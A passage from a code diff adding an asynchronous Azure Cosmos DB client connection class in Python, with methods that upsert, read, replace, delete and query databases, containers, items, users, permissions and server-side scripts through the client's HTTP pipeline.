+ headers = base.GetHeaders(self, initial_headers, "post", path, id, typ, options)
+ # Create will use WriteEndpoint since it uses POST operation
+
+ request_params = _request_object.RequestObject(typ, documents._OperationType.Create)
+ result, self.last_response_headers = await self.__Post(path, request_params, body, headers, **kwargs)
+
+ # update session for write request
+ self._UpdateSessionIfRequired(headers, result, self.last_response_headers)
+ return result
+
+ async def UpsertUser(self, database_link, user, options=None, **kwargs):
+ """Upserts a user.
+
+ :param str database_link:
+ The link to the database.
+ :param dict user:
+ The Azure Cosmos user to upsert.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The upserted User.
+ :rtype: dict
+ """
+ if options is None:
+ options = {}
+
+ database_id, path = self._GetDatabaseIdWithPathForUser(database_link, user)
+ return await self.Upsert(user, path, "users", database_id, None, options, **kwargs)
+
+ async def UpsertPermission(self, user_link, permission, options=None, **kwargs):
+ """Upserts a permission for a user.
+
+ :param str user_link:
+ The link to the user entity.
+ :param dict permission:
+ The Azure Cosmos user permission to upsert.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The upserted permission.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path, user_id = self._GetUserIdWithPathForPermission(permission, user_link)
+ return await self.Upsert(permission, path, "permissions", user_id, None, options, **kwargs)
+
+ async def UpsertItem(self, database_or_container_link, document, options=None, **kwargs):
+ """Upserts a document in a collection.
+
+ :param str database_or_container_link:
+ The link to the database when using partitioning, otherwise link to the document collection.
+ :param dict document:
+ The Azure Cosmos document to upsert.
+ :param dict options:
+ The request options for the request.
+ :param bool options['disableAutomaticIdGeneration']:
+ Disables the automatic id generation. If id is missing in the body and this
+ option is true, an error will be returned.
+
+ :return:
+ The upserted Document.
+ :rtype:
+ dict
+
+ """
+ # Python's default arguments are evaluated once when the function is defined,
+ # not each time the function is called (like it is in say, Ruby). This means
+ # that if you use a mutable default argument and mutate it, you will and have
+ # mutated that object for all future calls to the function as well. So, using
+ # a non-mutable default in this case (None) and assigning an empty dict (mutable)
+ # inside the method. For more details on this gotcha, please refer to
+ # http://docs.python-guide.org/en/latest/writing/gotchas/
+ if options is None:
+ options = {}
+
+ # We check the link to be document collection link since it can be database
+ # link in case of client side partitioning
+ if base.IsItemContainerLink(database_or_container_link):
+ options = await self._AddPartitionKey(database_or_container_link, document, options)
+
+ collection_id, document, path = self._GetContainerIdWithPathForItem(
+ database_or_container_link, document, options
+ )
+ return await self.Upsert(document, path, "docs", collection_id, None, options, **kwargs)
+
+ async def Upsert(self, body, path, typ, id, initial_headers, options=None, **kwargs): # pylint: disable=redefined-builtin
+ """Upserts an Azure Cosmos resource and returns it.
+
+ :param dict body:
+ :param str path:
+ :param str typ:
+ :param str id:
+ :param dict initial_headers:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The upserted Azure Cosmos resource.
+ :rtype: + dict + + """ + if options is None: + options = {} + + initial_headers = initial_headers or self.default_headers + headers = base.GetHeaders(self, initial_headers, "post", path, id, typ, options) + + headers[http_constants.HttpHeaders.IsUpsert] = True + + # Upsert will use WriteEndpoint since it uses POST operation + request_params = _request_object.RequestObject(typ, documents._OperationType.Upsert) + result, self.last_response_headers = await self.__Post(path, request_params, body, headers, **kwargs) + # update session for write request + self._UpdateSessionIfRequired(headers, result, self.last_response_headers) + return result + + async def __Post(self, path, request_params, body, req_headers, **kwargs): + """Azure Cosmos 'POST' async http request. + + :params str url: + :params str path: + :params (str, unicode, dict) body: + :params dict req_headers: + + :return: + Tuple of (result, headers). + :rtype: + tuple of (dict, dict) + + """ + request = self.pipeline_client.post(url=path, headers=req_headers) + return await asynchronous_request.AsynchronousRequest( + client=self, + request_params=request_params, + global_endpoint_manager=self._global_endpoint_manager, + connection_policy=self.connection_policy, + pipeline_client=self.pipeline_client, + request=request, + request_data=body, + **kwargs + ) + + async def ReadDatabase(self, database_link, options=None, **kwargs): + """Reads a database. + + :param str database_link: + The link to the database. + :param dict options: + The request options for the request. + :return: + The Database that was read. + :rtype: dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(database_link) + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + return await self.Read(path, "dbs", database_id, None, options, **kwargs) + + async def ReadContainer(self, collection_link, options=None, **kwargs): + """Reads a collection. + + :param str collection_link: + The link to the document collection. + :param dict options: + The request options for the request. + + :return: + The read Collection. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(collection_link) + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + return await self.Read(path, "colls", collection_id, None, options, **kwargs) + + async def ReadItem(self, document_link, options=None, **kwargs): + """Reads a document. + + :param str document_link: + The link to the document. + :param dict options: + The request options for the request. + + :return: + The read Document. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(document_link) + document_id = base.GetResourceIdOrFullNameFromLink(document_link) + return await self.Read(path, "docs", document_id, None, options, **kwargs) + + async def ReadUser(self, user_link, options=None, **kwargs): + """Reads a user. + + :param str user_link: + The link to the user entity. + :param dict options: + The request options for the request. + + :return: + The read User. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(user_link) + user_id = base.GetResourceIdOrFullNameFromLink(user_link) + return await self.Read(path, "users", user_id, None, options, **kwargs) + + async def ReadPermission(self, permission_link, options=None, **kwargs): + """Reads a permission. + + :param str permission_link: + The link to the permission. 
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The read permission.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(permission_link)
+ permission_id = base.GetResourceIdOrFullNameFromLink(permission_link)
+ return await self.Read(path, "permissions", permission_id, None, options, **kwargs)
+
+ async def ReadUserDefinedFunction(self, udf_link, options=None, **kwargs):
+ """Reads a user-defined function.
+
+ :param str udf_link:
+ The link to the user-defined function.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The read UDF.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(udf_link)
+ udf_id = base.GetResourceIdOrFullNameFromLink(udf_link)
+ return await self.Read(path, "udfs", udf_id, None, options, **kwargs)
+
+ async def ReadStoredProcedure(self, sproc_link, options=None, **kwargs):
+ """Reads a stored procedure.
+
+ :param str sproc_link:
+ The link to the stored procedure.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The read Stored Procedure.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(sproc_link)
+ sproc_id = base.GetResourceIdOrFullNameFromLink(sproc_link)
+ return await self.Read(path, "sprocs", sproc_id, None, options, **kwargs)
+
+ async def ReadTrigger(self, trigger_link, options=None, **kwargs):
+ """Reads a trigger.
+
+ :param str trigger_link:
+ The link to the trigger.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The read Trigger.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(trigger_link)
+ trigger_id = base.GetResourceIdOrFullNameFromLink(trigger_link)
+ return await self.Read(path, "triggers", trigger_id, None, options, **kwargs)
+
+ async def ReadConflict(self, conflict_link, options=None, **kwargs):
+ """Reads a conflict.
+
+ :param str conflict_link:
+ The link to the conflict.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The read Conflict.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(conflict_link)
+ conflict_id = base.GetResourceIdOrFullNameFromLink(conflict_link)
+ return await self.Read(path, "conflicts", conflict_id, None, options, **kwargs)
+
+ async def Read(self, path, typ, id, initial_headers, options=None, **kwargs): # pylint: disable=redefined-builtin
+ """Reads an Azure Cosmos resource and returns it.
+
+ :param str path:
+ :param str typ:
+ :param str id:
+ :param dict initial_headers:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The read Azure Cosmos resource.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ initial_headers = initial_headers or self.default_headers
+ headers = base.GetHeaders(self, initial_headers, "get", path, id, typ, options)
+ # Read will use ReadEndpoint since it uses GET operation
+ request_params = _request_object.RequestObject(typ, documents._OperationType.Read)
+ result, self.last_response_headers = await self.__Get(path, request_params, headers, **kwargs)
+ return result
+
+ async def __Get(self, path, request_params, req_headers, **kwargs):
+ """Azure Cosmos 'GET' async http request.
+
+ :params str url:
+ :params str path:
+ :params dict req_headers:
+
+ :return:
+ Tuple of (result, headers).
+ :rtype:
+ tuple of (dict, dict)
+
+ """
+ request = self.pipeline_client.get(url=path, headers=req_headers)
+ return await asynchronous_request.AsynchronousRequest(
+ client=self,
+ request_params=request_params,
+ global_endpoint_manager=self._global_endpoint_manager,
+ connection_policy=self.connection_policy,
+ pipeline_client=self.pipeline_client,
+ request=request,
+ request_data=None,
+ **kwargs
+ )
+
+ async def ReplaceUser(self, user_link, user, options=None, **kwargs):
+ """Replaces a user and returns it.
+
+ :param str user_link:
+ The link to the user entity.
+ :param dict user:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The new User.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ CosmosClientConnection.__ValidateResource(user)
+ path = base.GetPathFromLink(user_link)
+ user_id = base.GetResourceIdOrFullNameFromLink(user_link)
+ return await self.Replace(user, path, "users", user_id, None, options, **kwargs)
+
+ async def ReplacePermission(self, permission_link, permission, options=None, **kwargs):
+ """Replaces a permission and returns it.
+
+ :param str permission_link:
+ The link to the permission.
+ :param dict permission:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The new Permission.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ CosmosClientConnection.__ValidateResource(permission)
+ path = base.GetPathFromLink(permission_link)
+ permission_id = base.GetResourceIdOrFullNameFromLink(permission_link)
+ return await self.Replace(permission, path, "permissions", permission_id, None, options, **kwargs)
+
+ async def ReplaceContainer(self, collection_link, collection, options=None, **kwargs):
+ """Replaces a collection and returns it.
+
+ :param str collection_link:
+ The link to the collection entity.
+ :param dict collection:
+ The collection to be used.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The new Collection.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ CosmosClientConnection.__ValidateResource(collection)
+ path = base.GetPathFromLink(collection_link)
+ collection_id = base.GetResourceIdOrFullNameFromLink(collection_link)
+ return await self.Replace(collection, path, "colls", collection_id, None, options, **kwargs)
+
+ async def ReplaceUserDefinedFunction(self, udf_link, udf, options=None, **kwargs):
+ """Replaces a user-defined function and returns it.
+
+ :param str udf_link:
+ The link to the user-defined function.
+ :param dict udf:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The new UDF.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ CosmosClientConnection.__ValidateResource(udf)
+ udf = udf.copy()
+ if udf.get("serverScript"):
+ udf["body"] = str(udf.pop("serverScript", ""))
+ elif udf.get("body"):
+ udf["body"] = str(udf["body"])
+
+ path = base.GetPathFromLink(udf_link)
+ udf_id = base.GetResourceIdOrFullNameFromLink(udf_link)
+ return await self.Replace(udf, path, "udfs", udf_id, None, options, **kwargs)
+
+ async def ReplaceTrigger(self, trigger_link, trigger, options=None, **kwargs):
+ """Replaces a trigger and returns it.
+
+ :param str trigger_link:
+ The link to the trigger.
+ :param dict trigger:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The replaced Trigger.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ CosmosClientConnection.__ValidateResource(trigger)
+ trigger = trigger.copy()
+ if trigger.get("serverScript"):
+ trigger["body"] = str(trigger.pop("serverScript", ""))
+ elif trigger.get("body"):
+ trigger["body"] = str(trigger["body"])
+
+ path = base.GetPathFromLink(trigger_link)
+ trigger_id = base.GetResourceIdOrFullNameFromLink(trigger_link)
+ return await self.Replace(trigger, path, "triggers", trigger_id, None, options, **kwargs)
+
+ async def ReplaceItem(self, document_link, new_document, options=None, **kwargs):
+ """Replaces a document and returns it.
+
+ :param str document_link:
+ The link to the document.
+ :param dict new_document:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The new Document.
+ :rtype:
+ dict
+
+ """
+ CosmosClientConnection.__ValidateResource(new_document)
+ path = base.GetPathFromLink(document_link)
+ document_id = base.GetResourceIdOrFullNameFromLink(document_link)
+
+ # Python's default arguments are evaluated once when the function is defined,
+ # not each time the function is called (like it is in say, Ruby). This means
+ # that if you use a mutable default argument and mutate it, you will and have
+ # mutated that object for all future calls to the function as well. So, using
+ # a non-mutable default in this case (None) and assigning an empty dict (mutable)
+ # inside the function so that it remains local. For more details on this gotcha,
+ # please refer to http://docs.python-guide.org/en/latest/writing/gotchas/
+ if options is None:
+ options = {}
+
+ # Extract the document collection link and add the partition key to options
+ collection_link = base.GetItemContainerLink(document_link)
+ options = await self._AddPartitionKey(collection_link, new_document, options)
+
+ return await self.Replace(new_document, path, "docs", document_id, None, options, **kwargs)
+
+ async def ReplaceOffer(self, offer_link, offer, **kwargs):
+ """Replaces an offer and returns it.
+
+ :param str offer_link:
+ The link to the offer.
+ :param dict offer:
+
+ :return:
+ The replaced Offer.
+ :rtype:
+ dict
+
+ """
+ CosmosClientConnection.__ValidateResource(offer)
+ path = base.GetPathFromLink(offer_link)
+ offer_id = base.GetResourceIdOrFullNameFromLink(offer_link)
+ return await self.Replace(offer, path, "offers", offer_id, None, None, **kwargs)
+
+ async def ReplaceStoredProcedure(self, sproc_link, sproc, options=None, **kwargs):
+ """Replaces a stored procedure and returns it.
+
+ :param str sproc_link:
+ The link to the stored procedure.
+ :param dict sproc:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The replaced Stored Procedure.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ CosmosClientConnection.__ValidateResource(sproc)
+ sproc = sproc.copy()
+ if sproc.get("serverScript"):
+ sproc["body"] = str(sproc.pop("serverScript", ""))
+ elif sproc.get("body"):
+ sproc["body"] = str(sproc["body"])
+
+ path = base.GetPathFromLink(sproc_link)
+ sproc_id = base.GetResourceIdOrFullNameFromLink(sproc_link)
+ return await self.Replace(sproc, path, "sprocs", sproc_id, None, options, **kwargs)
+
+ async def Replace(self, resource, path, typ, id, initial_headers, options=None, **kwargs): # pylint: disable=redefined-builtin
+ """Replaces an Azure Cosmos resource and returns it.
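+
+ All of the public ``Replace*`` helpers above funnel into this method; for
+ example, ``ReplaceTrigger`` ends with a call of the form::
+
+ await self.Replace(trigger, path, "triggers", trigger_id, None, options)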
+ + :param dict resource: + :param str path: + :param str typ: + :param str id: + :param dict initial_headers: + :param dict options: + The request options for the request. + + :return: + The new Azure Cosmos resource. + :rtype: + dict + + """ + if options is None: + options = {} + + initial_headers = initial_headers or self.default_headers + headers = base.GetHeaders(self, initial_headers, "put", path, id, typ, options) + # Replace will use WriteEndpoint since it uses PUT operation + request_params = _request_object.RequestObject(typ, documents._OperationType.Replace) + result, self.last_response_headers = await self.__Put(path, request_params, resource, headers, **kwargs) + + # update session for request mutates data on server side + self._UpdateSessionIfRequired(headers, result, self.last_response_headers) + return result + + async def __Put(self, path, request_params, body, req_headers, **kwargs): + """Azure Cosmos 'PUT' async http request. + + :params str url: + :params str path: + :params (str, unicode, dict) body: + :params dict req_headers: + + :return: + Tuple of (result, headers). + :rtype: + tuple of (dict, dict) + + """ + request = self.pipeline_client.put(url=path, headers=req_headers) + return await asynchronous_request.AsynchronousRequest( + client=self, + request_params=request_params, + global_endpoint_manager=self._global_endpoint_manager, + connection_policy=self.connection_policy, + pipeline_client=self.pipeline_client, + request=request, + request_data=body, + **kwargs + ) + + async def DeleteDatabase(self, database_link, options=None, **kwargs): + """Deletes a database. + + :param str database_link: + The link to the database. + :param dict options: + The request options for the request. + + :return: + The deleted Database. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(database_link) + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + return await self.DeleteResource(path, "dbs", database_id, None, options, **kwargs) + + async def DeleteUser(self, user_link, options=None, **kwargs): + """Deletes a user. + + :param str user_link: + The link to the user entity. + :param dict options: + The request options for the request. + + :return: + The deleted user. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(user_link) + user_id = base.GetResourceIdOrFullNameFromLink(user_link) + return await self.DeleteResource(path, "users", user_id, None, options, **kwargs) + + async def DeletePermission(self, permission_link, options=None, **kwargs): + """Deletes a permission. + + :param str permission_link: + The link to the permission. + :param dict options: + The request options for the request. + + :return: + The deleted Permission. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(permission_link) + permission_id = base.GetResourceIdOrFullNameFromLink(permission_link) + return await self.DeleteResource(path, "permissions", permission_id, None, options, **kwargs) + + async def DeleteContainer(self, collection_link, options=None, **kwargs): + """Deletes a collection. + + :param str collection_link: + The link to the document collection. + :param dict options: + The request options for the request. + + :return: + The deleted Collection. 
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(collection_link)
+ collection_id = base.GetResourceIdOrFullNameFromLink(collection_link)
+ return await self.DeleteResource(path, "colls", collection_id, None, options, **kwargs)
+
+ async def DeleteItem(self, document_link, options=None, **kwargs):
+ """Deletes a document.
+
+ :param str document_link:
+ The link to the document.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The deleted Document.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(document_link)
+ document_id = base.GetResourceIdOrFullNameFromLink(document_link)
+ return await self.DeleteResource(path, "docs", document_id, None, options, **kwargs)
+
+ async def DeleteUserDefinedFunction(self, udf_link, options=None, **kwargs):
+ """Deletes a user-defined function.
+
+ :param str udf_link:
+ The link to the user-defined function.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The deleted UDF.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(udf_link)
+ udf_id = base.GetResourceIdOrFullNameFromLink(udf_link)
+ return await self.DeleteResource(path, "udfs", udf_id, None, options, **kwargs)
+
+ async def DeleteTrigger(self, trigger_link, options=None, **kwargs):
+ """Deletes a trigger.
+
+ :param str trigger_link:
+ The link to the trigger.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The deleted Trigger.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(trigger_link)
+ trigger_id = base.GetResourceIdOrFullNameFromLink(trigger_link)
+ return await self.DeleteResource(path, "triggers", trigger_id, None, options, **kwargs)
+
+ async def DeleteStoredProcedure(self, sproc_link, options=None, **kwargs):
+ """Deletes a stored procedure.
+
+ :param str sproc_link:
+ The link to the stored procedure.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The deleted Stored Procedure.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(sproc_link)
+ sproc_id = base.GetResourceIdOrFullNameFromLink(sproc_link)
+ return await self.DeleteResource(path, "sprocs", sproc_id, None, options, **kwargs)
+
+ async def DeleteConflict(self, conflict_link, options=None, **kwargs):
+ """Deletes a conflict.
+
+ :param str conflict_link:
+ The link to the conflict.
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The deleted Conflict.
+ :rtype:
+ dict
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(conflict_link)
+ conflict_id = base.GetResourceIdOrFullNameFromLink(conflict_link)
+ return await self.DeleteResource(path, "conflicts", conflict_id, None, options, **kwargs)
+
+ async def DeleteResource(self, path, typ, id, initial_headers, options=None, **kwargs): # pylint: disable=redefined-builtin
+ """Deletes an Azure Cosmos resource and returns it.
+
+ :param str path:
+ :param str typ:
+ :param str id:
+ :param dict initial_headers:
+ :param dict options:
+ The request options for the request.
+
+ :return:
+ The deleted Azure Cosmos resource.
+ :rtype: + dict + + """ + if options is None: + options = {} + + initial_headers = initial_headers or self.default_headers + headers = base.GetHeaders(self, initial_headers, "delete", path, id, typ, options) + # Delete will use WriteEndpoint since it uses DELETE operation + request_params = _request_object.RequestObject(typ, documents._OperationType.Delete) + result, self.last_response_headers = await self.__Delete(path, request_params, headers, **kwargs) + + # update session for request mutates data on server side + self._UpdateSessionIfRequired(headers, result, self.last_response_headers) + + return result + + async def __Delete(self, path, request_params, req_headers, **kwargs): + """Azure Cosmos 'DELETE' async http request. + + :params str url: + :params str path: + :params dict req_headers: + + :return: + Tuple of (result, headers). + :rtype: + tuple of (dict, dict) + + """ + request = self.pipeline_client.delete(url=path, headers=req_headers) + return await asynchronous_request.AsynchronousRequest( + client=self, + request_params=request_params, + global_endpoint_manager=self._global_endpoint_manager, + connection_policy=self.connection_policy, + pipeline_client=self.pipeline_client, + request=request, + request_data=None, + **kwargs + ) + + def _ReadPartitionKeyRanges(self, collection_link, feed_options=None, **kwargs): + """Reads Partition Key Ranges. + + :param str collection_link: + The link to the document collection. + :param dict feed_options: + + :return: + Query Iterable of PartitionKeyRanges. + :rtype: + query_iterable.QueryIterable + + """ + if feed_options is None: + feed_options = {} + + return self._QueryPartitionKeyRanges(collection_link, None, feed_options, **kwargs) + + def _QueryPartitionKeyRanges(self, collection_link, query, options=None, **kwargs): + """Queries Partition Key Ranges in a collection. + + :param str collection_link: + The link to the document collection. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of PartitionKeyRanges. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(collection_link, "pkranges") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + + async def fetch_fn(options): + return ( + await self.__QueryFeed( + path, "pkranges", collection_id, lambda r: r["PartitionKeyRanges"], + lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return AsyncItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def ReadDatabases(self, options=None, **kwargs): + """Reads all databases. + + :param dict options: + The request options for the request. + + :return: + Query Iterable of Databases. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryDatabases(None, options, **kwargs) + + def QueryDatabases(self, query, options=None, **kwargs): + """Queries databases. + + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: Query Iterable of Databases. 
+ :rtype:
+ query_iterable.QueryIterable
+
+ """
+ if options is None:
+ options = {}
+
+ async def fetch_fn(options):
+ return (
+ await self.__QueryFeed(
+ "/dbs", "dbs", "", lambda r: r["Databases"],
+ lambda _, b: b, query, options, **kwargs
+ ),
+ self.last_response_headers,
+ )
+
+ return AsyncItemPaged(
+ self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable
+ )
+
+ def ReadContainers(self, database_link, options=None, **kwargs):
+ """Reads all collections in a database.
+
+ :param str database_link:
+ The link to the database.
+ :param dict options:
+ The request options for the request.
+
+ :return: Query Iterable of Collections.
+ :rtype:
+ query_iterable.QueryIterable
+
+ """
+ if options is None:
+ options = {}
+
+ return self.QueryContainers(database_link, None, options, **kwargs)
+
+ def QueryContainers(self, database_link, query, options=None, **kwargs):
+ """Queries collections in a database.
+
+ :param str database_link:
+ The link to the database.
+ :param (str or dict) query:
+ :param dict options:
+ The request options for the request.
+
+ :return: Query Iterable of Collections.
+ :rtype:
+ query_iterable.QueryIterable
+
+ """
+ if options is None:
+ options = {}
+
+ path = base.GetPathFromLink(database_link, "colls")
+ database_id = base.GetResourceIdOrFullNameFromLink(database_link)
+
+ async def fetch_fn(options):
+ return (
+ await self.__QueryFeed(
+ path, "colls", database_id, lambda r: r["DocumentCollections"],
+ lambda _, body: body, query, options, **kwargs
+ ),
+ self.last_response_headers,
+ )
+
+ return AsyncItemPaged(
+ self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable
+ )
+
+ def ReadItems(self, collection_link, feed_options=None, response_hook=None, **kwargs):
+ """Reads all documents in a collection.
+
+ :param str collection_link:
+ The link to the document collection.
+ :param dict feed_options:
+ :param response_hook:
+ A callable invoked with the response metadata.
+
+ :return:
+ Query Iterable of Documents.
+ :rtype:
+ query_iterable.QueryIterable
+
+ """
+ if feed_options is None:
+ feed_options = {}
+
+ return self.QueryItems(collection_link, None, feed_options, response_hook=response_hook, **kwargs)
+
+ def QueryItems(
+ self,
+ database_or_container_link,
+ query,
+ options=None,
+ partition_key=None,
+ response_hook=None,
+ **kwargs
+ ):
+ """Queries documents in a collection.
+
+ :param str database_or_container_link:
+ The link to the database when using partitioning, otherwise link to the document collection.
+ :param (str or dict) query:
+ :param dict options:
+ The request options for the request.
+ :param str partition_key:
+ Partition key for the query (default value None).
+ :param response_hook:
+ A callable invoked with the response metadata.
+
+ :return:
+ Query Iterable of Documents.
+        :rtype:
+            query_iterable.QueryIterable
+
+        """
+        database_or_container_link = base.TrimBeginningAndEndingSlashes(database_or_container_link)
+
+        if options is None:
+            options = {}
+
+        if base.IsDatabaseLink(database_or_container_link):
+            return AsyncItemPaged(
+                self,
+                query,
+                options,
+                database_link=database_or_container_link,
+                partition_key=partition_key,
+                page_iterator_class=query_iterable.QueryIterable
+            )
+
+        path = base.GetPathFromLink(database_or_container_link, "docs")
+        collection_id = base.GetResourceIdOrFullNameFromLink(database_or_container_link)
+
+        async def fetch_fn(options):
+            return (
+                await self.__QueryFeed(
+                    path,
+                    "docs",
+                    collection_id,
+                    lambda r: r["Documents"],
+                    lambda _, b: b,
+                    query,
+                    options,
+                    response_hook=response_hook,
+                    **kwargs
+                ),
+                self.last_response_headers,
+            )
+
+        return AsyncItemPaged(
+            self,
+            query,
+            options,
+            fetch_function=fetch_fn,
+            collection_link=database_or_container_link,
+            page_iterator_class=query_iterable.QueryIterable
+        )
+
+    def QueryItemsChangeFeed(self, collection_link, options=None, response_hook=None, **kwargs):
+        """Queries the documents change feed in a collection.
+
+        :param str collection_link:
+            The link to the document collection.
+        :param dict options:
+            The request options for the request.
+            options may also specify the partition key range id.
+        :param response_hook:
+            A callable invoked with the response metadata
+
+        :return:
+            Query Iterable of Documents.
+        :rtype:
+            query_iterable.QueryIterable
+
+        """
+
+        partition_key_range_id = None
+        if options is not None and "partitionKeyRangeId" in options:
+            partition_key_range_id = options["partitionKeyRangeId"]
+
+        return self._QueryChangeFeed(
+            collection_link, "Documents", options, partition_key_range_id, response_hook=response_hook, **kwargs
+        )
+
+    def _QueryChangeFeed(
+        self, collection_link, resource_type, options=None, partition_key_range_id=None, response_hook=None, **kwargs
+    ):
+        """Queries the change feed of a resource in a collection.
+
+        :param str collection_link:
+            The link to the document collection.
+        :param str resource_type:
+            The type of the resource.
+        :param dict options:
+            The request options for the request.
+        :param str partition_key_range_id:
+            Specifies partition key range id.
+        :param response_hook:
+            A callable invoked with the response metadata
+
+        :return:
+            Query Iterable of Documents.
+        :rtype:
+            query_iterable.QueryIterable
+
+        """
+        if options is None:
+            options = {}
+        options["changeFeed"] = True
+
+        resource_key_map = {"Documents": "docs"}
+
+        # For now, change feed only supports the Documents and Partition Key Range resource types
+        if resource_type not in resource_key_map:
+            raise NotImplementedError(resource_type + " change feed query is not supported.")
+
+        resource_key = resource_key_map[resource_type]
+        path = base.GetPathFromLink(collection_link, resource_key)
+        collection_id = base.GetResourceIdOrFullNameFromLink(collection_link)
+
+        async def fetch_fn(options):
+            return (
+                await self.__QueryFeed(
+                    path,
+                    resource_key,
+                    collection_id,
+                    lambda r: r[resource_type],
+                    lambda _, b: b,
+                    None,
+                    options,
+                    partition_key_range_id,
+                    response_hook=response_hook,
+                    **kwargs
+                ),
+                self.last_response_headers,
+            )
+
+        return AsyncItemPaged(
+            self,
+            None,
+            options,
+            fetch_function=fetch_fn,
+            collection_link=collection_link,
+            page_iterator_class=query_iterable.QueryIterable
+        )
+
+    def QueryOffers(self, query, options=None, **kwargs):
+        """Query for all offers.
+
+        :param (str or dict) query:
+        :param dict options:
+            The request options for the request.
+
+        :return:
+            Query Iterable of Offers.
+        :rtype:
+            query_iterable.QueryIterable
+
+        """
+        if options is None:
+            options = {}
+
+        async def fetch_fn(options):
+            return (
+                await self.__QueryFeed(
+                    "/offers", "offers", "", lambda r: r["Offers"], lambda _, b: b, query, options, **kwargs
+                ),
+                self.last_response_headers,
+            )
+
+        return AsyncItemPaged(
+            self,
+            query,
+            options,
+            fetch_function=fetch_fn,
+            page_iterator_class=query_iterable.QueryIterable
+        )
+
+    def ReadUsers(self, database_link, options=None, **kwargs):
+        """Reads all users in a database.
+
+        :param str database_link:
+            The link to the database.
+        :param dict options:
+            The request options for the request.
+
+        :return:
+            Query Iterable of Users.
+        :rtype:
+            query_iterable.QueryIterable
+
+        """
+        if options is None:
+            options = {}
+
+        return self.QueryUsers(database_link, None, options, **kwargs)
+
+    def QueryUsers(self, database_link, query, options=None, **kwargs):
+        """Queries users in a database.
+
+        :param str database_link:
+            The link to the database.
+        :param (str or dict) query:
+        :param dict options:
+            The request options for the request.
+
+        :return:
+            Query Iterable of Users.
+        :rtype:
+            query_iterable.QueryIterable
+
+        """
+        if options is None:
+            options = {}
+
+        path = base.GetPathFromLink(database_link, "users")
+        database_id = base.GetResourceIdOrFullNameFromLink(database_link)
+
+        async def fetch_fn(options):
+            return (
+                await self.__QueryFeed(
+                    path, "users", database_id, lambda r: r["Users"],
+                    lambda _, b: b, query, options, **kwargs
+                ),
+                self.last_response_headers,
+            )
+
+        return AsyncItemPaged(
+            self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable
+        )
+
+    def ReadPermissions(self, user_link, options=None, **kwargs):
+        """Reads all permissions for a user.
+
+        :param str user_link:
+            The link to the user entity.
+        :param dict options:
+            The request options for the request.
+
+        :return:
+            Query Iterable of Permissions.
+        :rtype:
+            query_iterable.QueryIterable
+
+        """
+        if options is None:
